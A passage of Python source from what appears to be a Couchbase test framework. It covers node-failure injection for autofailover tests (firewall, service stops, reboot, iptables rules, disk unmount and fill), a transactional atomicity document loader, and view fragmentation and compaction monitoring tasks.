self.test_log.error(message)
self.set_exception(AutoFailoverException(message))
return False
if self.rebalance_in_progress:
status, stop_time = self._check_if_rebalance_in_progress(180)
if not status:
if stop_time == -1:
message = "Rebalance already completed before failover " \
"of node"
self.test_log.error(message)
self.set_exception(AutoFailoverException(message))
return False
elif stop_time == -2:
message = "Rebalance failed but no failed autofailover " \
"message was printed in logs"
self.test_log.warning(message)
else:
message = "Rebalance not failed even after 2 minutes " \
"after node failure."
self.test_log.error(message)
rest.print_UI_logs(10)
self.set_exception(AutoFailoverException(message))
return False
else:
self.start_time = stop_time
autofailover_initiated, time_taken = \
self._wait_for_autofailover_initiation(
self.max_time_to_wait_for_failover)
if self.expect_auto_failover and not self.auto_reprovision:
if autofailover_initiated:
if time_taken < max_timeout + 1:
self.test_log.debug("Autofailover of node {0} successfully"
" initiated in {1} sec"
.format(self.current_failure_node.ip,
time_taken))
rest.print_UI_logs(10)
return True
else:
message = "Autofailover of node {0} was initiated after " \
"the timeout period. Expected timeout: {1} " \
"Actual time taken: {2}".format(
self.current_failure_node.ip, self.timeout, time_taken)
self.test_log.error(message)
rest.print_UI_logs(10)
self.set_warn(AutoFailoverException(message))
return False
else:
message = "Autofailover of node {0} was not initiated after " \
"the expected timeout period of {1}".format(
self.current_failure_node.ip, self.timeout)
rest.print_UI_logs(10)
self.test_log.error(message)
self.set_warn(AutoFailoverException(message))
return False
else:
if autofailover_initiated:
message = "Node {0} was autofailed over but no autofailover " \
"of the node was expected" \
.format(self.current_failure_node.ip)
rest.print_UI_logs(10)
self.test_log.error(message)
if self.get_failover_count() == 1:
return True
self.set_exception(AutoFailoverException(message))
return False
elif self.expect_auto_failover:
self.test_log.error("Node not autofailed over as expected")
rest.print_UI_logs(10)
return False
def has_next(self):
return self.itr < self.num_servers_to_fail
def next(self):
if self.pause != 0:
self.test_log.debug("Wait before reset_auto_failover")
sleep(self.pause)
if self.pause > self.timeout and self.itr != 0:
rest = RestConnection(self.master)
status = rest.reset_autofailover()
self._rebalance()
if not status:
self.set_exception(Exception("Reset of autofailover "
"count failed"))
return False
self.current_failure_node = self.servers_to_fail[self.itr]
self.test_log.debug("Before failure time: {}"
.format(time.ctime(time.time())))
if self.failure_type == "enable_firewall":
self._enable_firewall(self.current_failure_node)
elif self.failure_type == "disable_firewall":
self._disable_firewall(self.current_failure_node)
elif self.failure_type == "restart_couchbase":
self._restart_couchbase_server(self.current_failure_node)
elif self.failure_type == "stop_couchbase":
self._stop_couchbase_server(self.current_failure_node)
elif self.failure_type == "start_couchbase":
self._start_couchbase_server(self.current_failure_node)
elif self.failure_type == "restart_network":
self._stop_restart_network(self.current_failure_node,
self.timeout + self.timeout_buffer + 30)
elif self.failure_type == "restart_machine":
self._restart_machine(self.current_failure_node)
elif self.failure_type == "stop_memcached":
self._stop_memcached(self.current_failure_node)
elif self.failure_type == "start_memcached":
self._start_memcached(self.current_failure_node)
elif self.failure_type == "network_split":
self._block_incoming_network_from_node(self.servers_to_fail[0],
self.servers_to_fail[
self.itr + 1])
self.itr += 1
elif self.failure_type == "disk_failure":
self._fail_disk(self.current_failure_node)
elif self.failure_type == "disk_full":
self._disk_full_failure(self.current_failure_node)
elif self.failure_type == "recover_disk_failure":
self._recover_disk(self.current_failure_node)
elif self.failure_type == "recover_disk_full_failure":
self._recover_disk_full_failure(self.current_failure_node)
self.test_log.debug("Start time = {}"
.format(time.ctime(self.start_time)))
self.itr += 1
def _enable_firewall(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
RemoteUtilHelper.enable_firewall(node)
self.test_log.debug("Enabled firewall on {}".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _disable_firewall(self, node):
shell = RemoteMachineShellConnection(node)
shell.disable_firewall()
shell.disconnect()
def _restart_couchbase_server(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
shell.restart_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Restarted couchbase server".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _stop_couchbase_server(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
shell.stop_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Stopped couchbase server".format(node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _start_couchbase_server(self, node):
shell = RemoteMachineShellConnection(node)
shell.start_couchbase()
shell.disconnect()
self.test_log.debug("{0} - Started couchbase server".format(node))
def _stop_restart_network(self, node, stop_time):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
shell.stop_network(stop_time)
shell.disconnect()
self.test_log.debug("Stopped the network for {0} sec and restarted "
"the network on {1}".format(stop_time, node))
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _restart_machine(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
command = "/sbin/reboot"
shell.execute_command(command=command)
shell.disconnect()
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _stop_memcached(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
self.check_failure_timer_task_start(node_failure_timer)
shell = RemoteMachineShellConnection(node)
o, r = shell.stop_memcached()
self.test_log.debug("Killed memcached. {0} {1}".format(o, r))
shell.disconnect()
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _start_memcached(self, node):
shell = RemoteMachineShellConnection(node)
o, r = shell.start_memcached()
self.test_log.debug("Started back memcached. {0} {1}".format(o, r))
shell.disconnect()
def _block_incoming_network_from_node(self, node1, node2):
shell = RemoteMachineShellConnection(node1)
self.test_log.debug("Adding {0} into iptables rules on {1}"
.format(node1.ip, node2.ip))
command = "iptables -A INPUT -s {0} -j DROP".format(node2.ip)
shell.execute_command(command)
shell.disconnect()
self.start_time = time.time()
def _fail_disk(self, node):
shell = RemoteMachineShellConnection(node)
output, error = shell.unmount_partition(self.disk_location)
success = True
if output:
for line in output:
if self.disk_location in line:
success = False
if success:
self.test_log.debug("Unmounted disk at location : {0} on {1}"
.format(self.disk_location, node.ip))
self.start_time = time.time()
else:
exception_str = "Could not fail the disk at {0} on {1}" \
.format(self.disk_location, node.ip)
self.test_log.error(exception_str)
self.set_exception(Exception(exception_str))
shell.disconnect()
def _recover_disk(self, node):
shell = RemoteMachineShellConnection(node)
o, r = shell.mount_partition(self.disk_location)
for line in o:
if self.disk_location in line:
self.test_log.debug("Mounted disk at location : {0} on {1}"
.format(self.disk_location, node.ip))
return
self.set_exception(Exception("Failed mount disk at location {0} on {1}"
.format(self.disk_location, node.ip)))
shell.disconnect()
raise Exception()
def _disk_full_failure(self, node):
shell = RemoteMachineShellConnection(node)
output, error = shell.fill_disk_space(self.disk_location,
self.disk_size)
success = False
if output:
for line in output:
if self.disk_location in line:
if "0 100% {0}".format(self.disk_location) in line:
success = True
if success:
self.test_log.debug("Filled up disk Space at {0} on {1}"
.format(self.disk_location, node.ip))
self.start_time = time.time()
else:
self.test_log.debug("Could not fill the disk at {0} on {1}"
.format(self.disk_location, node.ip))
self.set_exception(Exception("Failed to fill disk at {0} on {1}"
.format(self.disk_location, node.ip)))
shell.disconnect()
def _recover_disk_full_failure(self, node):
shell = RemoteMachineShellConnection(node)
delete_file = "{0}/disk-quota.ext3".format(self.disk_location)
output, error = shell.execute_command("rm -f {0}".format(delete_file))
self.test_log.debug(output)
if error:
self.test_log.error(error)
shell.disconnect()
def _check_for_autofailover_initiation(self, failed_over_node):
rest = RestConnection(self.master)
ui_logs = rest.get_logs(20)
ui_logs_text = [t["text"] for t in ui_logs]
ui_logs_time = [t["serverTime"] for t in ui_logs]
if self.auto_reprovision:
expected_log = "has been reprovisioned on following nodes: ['ns_1@{}']".format(
failed_over_node.ip)
else:
expected_log = "Starting failing over ['ns_1@{}']".format(
failed_over_node.ip)
if expected_log in ui_logs_text:
failed_over_time = ui_logs_time[ui_logs_text.index(expected_log)]
return True, failed_over_time
return False, None
def get_failover_count(self):
rest = RestConnection(self.master)
cluster_status = rest.cluster_status()
failover_count = 0
# check for inactiveFailed
for node in cluster_status['nodes']:
if node['clusterMembership'] == "inactiveFailed":
failover_count += 1
return failover_count
def _wait_for_autofailover_initiation(self, timeout):
autofailover_initated = False
while time.time() < timeout + self.start_time:
autofailover_initated, failed_over_time = \
self._check_for_autofailover_initiation(
self.current_failure_node)
if autofailover_initated:
end_time = self._get_mktime_from_server_time(failed_over_time)
time_taken = end_time - self.start_time
return autofailover_initated, time_taken
return autofailover_initated, -1
def _get_mktime_from_server_time(self, server_time):
time_format = "%Y-%m-%dT%H:%M:%S"
server_time = server_time.split('.')[0]
mk_time = time.mktime(time.strptime(server_time, time_format))
return mk_time
def _rebalance(self):
rest = RestConnection(self.master)
nodes = rest.node_statuses()
rest.rebalance(otpNodes=[node.id for node in nodes])
rebalance_progress = rest.monitorRebalance()
if not rebalance_progress:
self.set_result(False)
self.set_exception(Exception("Failed to rebalance after failover"))
def _check_if_rebalance_in_progress(self, timeout):
rest = RestConnection(self.master)
end_time = time.time() + timeout
while time.time() < end_time:
try:
rebalance_status, progress = \
rest._rebalance_status_and_progress()
if rebalance_status == "running":
continue
elif rebalance_status is None and progress == 100:
return False, -1
except RebalanceFailedException:
ui_logs = rest.get_logs(10)
ui_logs_text = [t["text"] for t in ui_logs]
ui_logs_time = [t["serverTime"] for t in ui_logs]
rebalace_failure_log = "Rebalance exited with reason"
for ui_log in ui_logs_text:
if rebalace_failure_log in ui_log:
rebalance_failure_time = ui_logs_time[
ui_logs_text.index(ui_log)]
failover_log = "Could not automatically fail over " \
"node ('ns_1@{}'). Rebalance is " \
"running.".format(
self.current_failure_node.ip)
if failover_log in ui_logs_text:
return True, self._get_mktime_from_server_time(
rebalance_failure_time)
else:
return False, -2
return False, -3
class NodeDownTimerTask(Task):
def __init__(self, node, port=None, timeout=300):
Task.__init__(self, "NodeDownTimerTask")
self.test_log.debug("Initializing NodeDownTimerTask")
self.node = node
self.port = port
self.timeout = timeout
self.start_time = 0
def call(self):
self.start_task()
self.test_log.debug("Starting execution of NodeDownTimerTask")
end_task = time.time() + self.timeout
while not self.completed and time.time() < end_task:
if not self.port:
try:
self.start_time = time.time()
response = os.system("ping -c 1 {} > /dev/null".format(
self.node))
if response != 0:
self.test_log.debug(
"Injected failure in {}. Caught due to ping"
.format(self.node))
self.complete_task()
self.set_result(True)
break
except Exception as e:
self.test_log.warning("Unexpected exception: %s" % e)
self.complete_task()
return True
try:
self.start_time = time.time()
socket.socket().connect(("%s" % self.node,
constants.port))
socket.socket().close()
socket.socket().connect(("%s" % self.node,
constants.memcached_port))
socket.socket().close()
except socket.error:
self.test_log.debug(
"Injected failure in %s. Caught due to ports"
% self.node)
self.complete_task()
return True
else:
try:
self.start_time = time.time()
socket.socket().connect(("%s" % self.node,
int(self.port)))
socket.socket().close()
socket.socket().connect(("%s" % self.node,
constants.memcached_port))
socket.socket().close()
except socket.error:
self.test_log.debug("Injected failure in %s" % self.node)
self.complete_task()
return True
if time.time() >= end_task:
self.complete_task()
self.test_log.error("Could not inject failure in %s" % self.node)
return False
class Atomicity(Task):
instances = 1
num_items = 110
mutations = num_items
start_from = 0
op_type = "insert"
persist_to = 1
replicate_to = 1
task_manager = list()
write_offset = list()
def __init__(self, cluster, task_manager, bucket, clients,
generator, op_type, exp, flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1,
timeout_secs=5, compression=None,
process_concurrency=8, print_ops_rate=True, retries=5,
update_count=1, transaction_timeout=5,
commit=True, durability=None, sync=True, num_threads=5,
record_fail=False, defer=False):
super(Atomicity, self).__init__("AtomicityDocLoadTask_%s_%s_%s_%s"
% (op_type, generator[0].start,
generator[0].end, time.time()))
self.generators = generator
self.cluster = cluster
self.commit = commit
self.record_fail = record_fail
self.defer = defer
self.num_docs = num_threads
self.exp = exp
self.flag = flag
self.sync = sync
self.persist_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.timeout_secs = timeout_secs
self.transaction_timeout = transaction_timeout
self.compression = compression
self.process_concurrency = process_concurrency
self.task_manager = task_manager
self.batch_size = batch_size
self.print_ops_rate = print_ops_rate
self.op_type = op_type
self.bucket = bucket
self.clients = clients
self.gen = list()
self.retries = retries
self.update_count = update_count
self.transaction_app = Transaction()
self.transaction = None
if durability == Bucket.DurabilityLevel.MAJORITY:
self.durability = 1
elif durability == \
Bucket.DurabilityLevel.MAJORITY_AND_PERSIST_TO_ACTIVE:
self.durability = 2
elif durability == Bucket.DurabilityLevel.PERSIST_TO_MAJORITY:
self.durability = 3
elif durability == "ONLY_NONE":
self.durability = 4
else:
self.durability = 0
sleep(10, "Wait before txn load")
def call(self):
tasks = list()
exception_seen = None
self.start_task()
if self.op_type == "time_out":
transaction_config = self.transaction_app.createTransactionConfig(
2, self.durability)
else:
self.test_log.info("Transaction timeout: %s"
% self.transaction_timeout)
transaction_config = self.transaction_app.createTransactionConfig(
self.transaction_timeout, self.durability)
try:
self.transaction = self.transaction_app.createTansaction(
self.clients[0][0].cluster, transaction_config)
self.test_log.info("Transaction: %s" % self.transaction)
except Exception as e:
self.set_exception(e)
for generator in self.generators:
tasks.extend(self.get_tasks(generator))
self.test_log.debug("Adding new tasks")
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
self.task_manager.get_task_result(task)
if task.exception is not None:
exception_seen = task.exception
self.transaction.close()
for con in self.clients:
for client in con:
client.close()
self.complete_task()
if exception_seen:
self.set_exception(exception_seen)
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(
int((generator.end - generator.start) / self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = self.Loader(self.cluster, self.bucket[i], self.clients,
generators[i], self.op_type,
self.exp, self.num_docs, self.update_count,
self.defer, self.sync, self.record_fail,
flag=self.flag,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
time_unit=self.time_unit,
batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
compression=self.compression,
instance_num=1,
transaction_app=self.transaction_app,
transaction=self.transaction,
commit=self.commit,
retries=self.retries)
tasks.append(task)
return tasks
class Loader(GenericLoadingTask):
"""
1. Start inserting data into buckets
2. Keep updating the write offset
3. Start the reader thread
4. Keep track of non durable documents
"""
def __init__(self, cluster, bucket, clients,
generator, op_type, exp,
num_docs, update_count, defer, sync, record_fail,
flag=0, persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1, timeout_secs=5,
compression=None, retries=5, instance_num=0,
transaction_app=None, transaction=None, commit=True,
sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection):
super(Atomicity.Loader, self).__init__(
cluster, bucket, clients[0][0],
batch_size=batch_size,
timeout_secs=timeout_secs, compression=compression,
retries=retries,
sdk_client_pool=sdk_client_pool,
scope=scope, collection=collection)
self.generator = generator
self.op_type = op_type.split(';')
self.thread_name = "Atomicity_Loader-%s_%s_%s_%s_%s" \
% (op_type, bucket,
generator._doc_gen.start,
generator._doc_gen.end,
time.time())
self.exp = exp
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.compression = compression
self.timeout_secs = timeout_secs
self.time_unit = time_unit
self.instance = instance_num
self.transaction_app = transaction_app
self.transaction = transaction
self.commit = commit
self.defer = defer
self.clients = clients
self.bucket = bucket
self.exp_unit = "seconds"
self.retries = retries
self.key_value_list = list()
self.exception = None
self.num_docs = num_docs
self.update_count = update_count
self.sync = sync
self.record_fail = record_fail
if self.op_type[-1] == "delete":
self.suppress_error_table = True
def has_next(self):
return self.generator.has_next()
def call(self):
self.start_task()
self.test_log.info("Starting Atomicity load generation thread")
self.all_keys = list()
self.update_keys = list()
self.delete_keys = list()
docs = list()
exception = None
doc_gen = self.generator
while self.has_next():
self.batch = doc_gen.next_batch()
self.key_value_list.extend(self.batch)
for tuple in self.key_value_list:
docs.append(tuple)
last_batch = dict(self.key_value_list[-10:])
self.all_keys = dict(self.key_value_list).keys()
self.list_docs = list(self.__chunks(self.all_keys,
self.num_docs))
self.docs = list(self.__chunks(self.key_value_list, self.num_docs))
for op_type in self.op_type:
self.encoding = list()
if op_type == 'general_create':
for client in self.clients[0]:
self.batch_create(
self.key_value_list, client,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type)
elif op_type == "create":
if len(self.op_type) != 1:
commit = True
else:
commit = self.commit
for self.doc in self.docs:
self.transaction_load(self.doc, commit,
op_type="create")
if not commit:
self.all_keys = []
elif op_type in ["update", "rebalance_only_update"]:
for doc in self.list_docs:
self.transaction_load(doc, self.commit,
op_type="update")
if self.commit:
self.update_keys = self.all_keys
elif op_type == "update_Rollback":
exception = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], self.update_keys,
[], False, True, self.update_count)
elif op_type == "delete" or op_type == "rebalance_delete":
for doc in self.list_docs:
self.transaction_load(doc, self.commit,
op_type="delete")
if self.commit:
self.delete_keys = self.all_keys
elif op_type == "general_update":
for client in self.clients[0]:
self.batch_update(self.batch, client,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
doc_type=self.generator.doc_type)
elif op_type == "general_delete":
self.test_log.debug("Performing delete for keys %s"
% last_batch.keys())
for client in self.clients[0]:
_ = self.batch_delete(
self.batch, client,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability="")
self.delete_keys = last_batch.keys()
elif op_type in ["rebalance_update", "create_update"]:
for i in range(len(self.docs)):
self.transaction_load(self.docs[i], self.commit,
self.list_docs[i],
op_type="create")
if self.commit:
self.update_keys = self.all_keys
elif op_type == "time_out":
err = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, docs, [], [],
True, True, self.update_count)
if "AttemptExpired" in str(err):
self.test_log.info("Transaction Expired as Expected")
for line in err:
self.test_log.info("%s" % line)
self.test_log.debug(
"End of First Transaction that is getting timeout")
else:
exception = err
# self.test_log.warning("Wait for txn to clean up")
# time.sleep(60)
if self.defer:
self.test_log.info("Commit/rollback deffered transaction")
self.retries = 5
if op_type != "create":
commit = self.commit
for encoded in self.encoding:
err = self.transaction_app.DefferedTransaction(
self.clients[0][0].cluster,
self.transaction, commit, encoded)
if err:
while self.retries > 0:
if SDKException.DurabilityImpossibleException \
in str(err):
self.retries -= 1
self.test_log.info(
"Retrying due to D_Impossible seen during deferred-transaction")
# sleep(60)
err = self.transaction_app.DefferedTransaction(
self.clients[0][0].cluster,
self.transaction, self.commit, encoded)
if err:
continue
break
else:
exception = err
break
if exception:
if self.record_fail:
self.all_keys = list()
else:
self.exception = Exception(exception)
break
self.test_log.info("Atomicity Load generation thread completed")
self.inserted_keys = dict()
for client in self.clients[0]:
self.inserted_keys[client] = []
self.inserted_keys[client].extend(self.all_keys)
self.test_log.info("Starting Atomicity Verification thread")
self.process_values_for_verification(self.key_value_list)
for client in self.clients[0]:
result_map = self.batch_read(self.all_keys, client)
wrong_values = self.validate_key_val(result_map[0],
self.key_value_list,
client)
if wrong_values:
self.exception = "Wrong key value: %s" \
% ','.join(wrong_values)
for key in self.delete_keys:
if key in self.inserted_keys[client]:
self.inserted_keys[client].remove(key)
if self.inserted_keys[client] \
and "time_out" not in self.op_type:
self.exception = "Keys missing: %s" \
% (','.join(self.inserted_keys[client]))
self.test_log.info("Completed Atomicity Verification thread")
self.complete_task()
def transaction_load(self, doc, commit=True, update_keys=[],
op_type="create"):
err = None
if self.defer:
if op_type == "create":
ret = self.transaction_app.DeferTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, doc, update_keys, [])
elif op_type == "update":
ret = self.transaction_app.DeferTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], doc, [])
elif op_type == "delete":
ret = self.transaction_app.DeferTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], [], doc)
err = ret.getT2()
else:
if op_type == "create":
err = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, doc, update_keys, [],
commit, self.sync, self.update_count)
elif op_type == "update":
err = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], doc, [],
commit, self.sync, self.update_count)
elif op_type == "delete":
err = self.transaction_app.RunTransaction(
self.clients[0][0].cluster,
self.transaction, self.bucket, [], [], doc,
commit, self.sync, self.update_count)
if err:
if self.record_fail:
self.all_keys = list()
elif SDKException.DurabilityImpossibleException in str(err) \
and self.retries > 0:
self.test_log.info("D_ImpossibleException so retrying..")
# sleep(60)
self.retries -= 1
self.transaction_load(doc, commit, update_keys, op_type)
# else:
# exception = err
elif self.defer:
self.encoding.append(ret.getT1())
def __chunks(self, l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def validate_key_val(self, map, key_value, client):
wrong_values = []
for item in key_value:
key = item.getT1()
value = item.getT2()
if key in map:
if self.op_type == "time_out":
expected_val = {}
else:
expected_val = Json.loads(value.toString())
actual_val = {}
if map[key]['cas'] != 0:
actual_val = Json.loads(map[key]['value'].toString())
elif map[key]['error'] is not None:
actual_val = map[key]['error'].toString()
if expected_val == actual_val or map[key]['cas'] == 0:
try:
self.inserted_keys[client].remove(key)
except:
pass
else:
wrong_values.append(key)
self.test_log.info("Key %s - Actual value %s,"
"Expected value: %s"
% (key, actual_val, expected_val))
return wrong_values
def process_values_for_verification(self, key_val):
for item in key_val:
key = item.getT1()
if key in self.update_keys or self.op_type == "verify":
try:
# New updated value, however it is not their
# in orignal code "LoadDocumentsTask"
value = item.getT2()
value.put('mutated', self.update_count)
except ValueError:
pass
finally:
key_val.remove(item)
item = Tuples.of(key, value)
key_val.append(item)
class MonitorViewFragmentationTask(Task):
"""
Attempt to monitor fragmentation that is occurring for a given design_doc.
execute stage is just for preliminary sanity checking of values and environment.
Check function looks at index file accross all nodes and attempts to calculate
total fragmentation occurring by the views within the design_doc.
Note: If autocompaction is enabled and user attempts to monitor for fragmentation
value higher than level at which auto_compaction kicks in a warning is sent and
it is best user to use lower value as this can lead to infinite monitoring.
"""
def __init__(self, server, design_doc_name, fragmentation_value=10,
bucket="default"):
Task.__init__(self, "monitor_frag_task")
self.server = server
self.bucket = bucket
self.fragmentation_value = fragmentation_value
self.design_doc_name = design_doc_name
self.result = False
def call(self):
self.start_task()
# sanity check of fragmentation value
if self.fragmentation_value < 0 or self.fragmentation_value > 100:
err_msg = "Invalid value for fragmentation %d" % self.fragmentation_value
self.set_exception(Exception(err_msg))
try:
auto_compact_percentage = self._get_current_auto_compaction_percentage()
if auto_compact_percentage != "undefined" \
and auto_compact_percentage < self.fragmentation_value:
self.test_log.warn(
"Auto compaction is set to %s. "
"Therefore fragmentation_value %s may not be reached"
% (auto_compact_percentage, self.fragmentation_value))
except GetBucketInfoFailed as e:
self.set_exception(e)
except Exception as e:
self.set_exception(e)
self.check()
self.complete_task()
def _get_current_auto_compaction_percentage(self):
""" check at bucket level and cluster level for compaction percentage """
auto_compact_percentage = None
rest = BucketHelper(self.server)
content = rest.get_bucket_json(self.bucket)
if content["autoCompactionSettings"] is False:
# try to read cluster level compaction settings
content = rest.cluster_status()
auto_compact_percentage = \
content["autoCompactionSettings"]["viewFragmentationThreshold"][
"percentage"]
return auto_compact_percentage
def check(self):
rest = RestConnection(self.server)
new_frag_value = 0
timeout = 300
while new_frag_value < self.fragmentation_value and timeout > 0:
new_frag_value = MonitorViewFragmentationTask.calc_ddoc_fragmentation(
rest, self.design_doc_name, bucket=self.bucket)
self.test_log.info("%s: current amount of fragmentation = %d, \
required: %d"
% (self.design_doc_name,
new_frag_value,
self.fragmentation_value))
if new_frag_value > self.fragmentation_value:
self.result = True
break
timeout -= 1
sleep(1, "Wait for fragmentation_level to reach", log_type="infra")
@staticmethod
def aggregate_ddoc_info(rest, design_doc_name, bucket="default",
with_rebalance=False):
infra_log = logger.get("infra")
nodes = rest.node_statuses()
info = []
for node in nodes:
server_info = {"ip": node.ip,
"port": node.port,
"username": rest.username,
"password": rest.password}
rest = RestConnection(server_info)
status = False
try:
status, content = rest.set_view_info(bucket, design_doc_name)
except Exception as e:
infra_log.error(e)
if "Error occured reading set_view _info" in str(
e) and with_rebalance:
infra_log.warning("Node {0} {1} not ready yet?: {2}"
.format(node.id, node.port, e.message))
else:
raise e
if status:
info.append(content)
return info
@staticmethod
def calc_ddoc_fragmentation(rest, design_doc_name, bucket="default",
with_rebalance=False):
total_disk_size = 0
total_data_size = 0
total_fragmentation = 0
nodes_ddoc_info = \
MonitorViewFragmentationTask.aggregate_ddoc_info(rest,
design_doc_name,
bucket,
with_rebalance)
total_disk_size = sum(
[content['disk_size'] for content in nodes_ddoc_info])
total_data_size = sum(
[content['data_size'] for content in nodes_ddoc_info])
if total_disk_size > 0 and total_data_size > 0:
total_fragmentation = \
(total_disk_size - total_data_size) / float(
total_disk_size) * 100
return total_fragmentation
class ViewCompactionTask(Task):
"""
Executes view compaction for a given design doc. This is technicially view compaction
as represented by the api and also because the fragmentation is generated by the
keys emitted by map/reduce functions within views. Task will check that compaction
history for design doc is incremented and if any work was really done.
"""
def __init__(self, server, design_doc_name, bucket="default",
with_rebalance=False):
Task.__init__(self, "view_compaction_task")
self.server = server
self.bucket = bucket
self.design_doc_name = design_doc_name
self.ddoc_id = "_design%2f" + design_doc_name
self.compaction_revision = 0
self.precompacted_fragmentation = 0
self.with_rebalance = with_rebalance
self.rest = RestConnection(self.server)
self.result = False
def call(self):
try:
self.compaction_revision, self.precompacted_fragmentation = \
self._get_compaction_details()
self.test_log.debug(
"{0}: stats compaction before triggering it: ({1},{2})"
.format(self.design_doc_name,
self.compaction_revision,
self.precompacted_fragmentation))
if self.precompacted_fragmentation == 0:
self.test_log.warning(
"%s: There is nothing to compact, fragmentation is 0"
% self.design_doc_name)
self.set_result(False)
return
self.rest.ddoc_compaction(self.ddoc_id, self.bucket)
self.check()
except (CompactViewFailed, SetViewInfoNotFound) as ex:
self.result = False
self.set_exception(ex)
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
self.set_exception(e)
# verify compaction history incremented and some defraging occurred
def check(self):
try:
_compaction_running = self._is_compacting()
new_compaction_revision, fragmentation = self._get_compaction_details()
self.test_log.debug(
"{0}: stats compaction:revision and fragmentation: ({1},{2})"
.format(self.design_doc_name,
new_compaction_revision,
fragmentation))
if new_compaction_revision == self.compaction_revision and _compaction_running:
# compaction ran successfully but compaction was not changed
# perhaps we are still compacting
self.test_log.debug("design doc {0} is compacting"
.format(self.design_doc_name))
self.check()
elif new_compaction_revision > self.compaction_revision or \
self.precompacted_fragmentation > fragmentation:
self.test_log.info(
"{1}: compactor was run, compaction revision was changed on {0}"
.format(new_compaction_revision,
self.design_doc_name))
frag_val_diff = fragmentation - self.precompacted_fragmentation
self.test_log.info("%s: fragmentation went from %d to %d"
% (self.design_doc_name,
self.precompacted_fragmentation,
fragmentation))
if frag_val_diff > 0:
# compaction ran successfully but datasize still same
# perhaps we are still compacting
if self._is_compacting():
self.check()
self.test_log.warning(
"Compaction completed, but fragmentation value {0} "
"is more than before compaction {1}"
.format(fragmentation,
self.precompacted_fragmentation))
# Probably we already compacted, so nothing to do here
self.set_result(self.with_rebalance)
else:
self.set_result(True)
else:
for i in xrange(20):
self.test_log.debug("Wait for compaction to start")
sleep(2)
if self._is_compacting():
self.check()
else:
new_compaction_revision, fragmentation = \
self._get_compaction_details()
self.test_log.info("{2}: stats compaction: ({0},{1})"
.format(new_compaction_revision,
fragmentation,
self.design_doc_name))
# case of rebalance when with concurrent updates
# it's possible that compacttion value has
# not changed significantly
if new_compaction_revision > self.compaction_revision \
and self.with_rebalance:
self.test_log.info("Compaction revision increased")
self.set_result(True)
return
else:
continue
# print details in case of failure
self.test_log.info("design doc {0} is compacting:{1}"
.format(self.design_doc_name,
self._is_compacting()))
new_compaction_revision, fragmentation = self._get_compaction_details()
self.test_log.error("Stats compaction still: ({0},{1})"
.format(new_compaction_revision,
fragmentation))
status, content = self.rest.set_view_info(self.bucket,
self.design_doc_name)
stats = content["stats"]
self.test_log.warn("General compaction stats:{0}"
.format(stats))
self.set_exception(
"Check system logs, looks like compaction failed to start")
except SetViewInfoNotFound as ex:
self.result = False
self.set_exception(ex)
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
self.set_exception(e)
def _get_compaction_details(self):
status, content = self.rest.set_view_info(self.bucket,
self.design_doc_name)
curr_no_of_compactions = content["stats"]["compactions"]
curr_ddoc_fragemtation = \
MonitorViewFragmentationTask.calc_ddoc_fragmentation(self.rest,
self.design_doc_name,
self.bucket,
self.with_rebalance)
return (curr_no_of_compactions, curr_ddoc_fragemtation)
def _is_compacting(self):
status, content = self.rest.set_view_info(self.bucket,
self.design_doc_name)
return content["compact_running"] == True
class CompactBucketTask(Task):
def __init__(self, server, bucket, timeout=300):
Task.__init__(self, "CompactionTask_%s" % bucket.name)
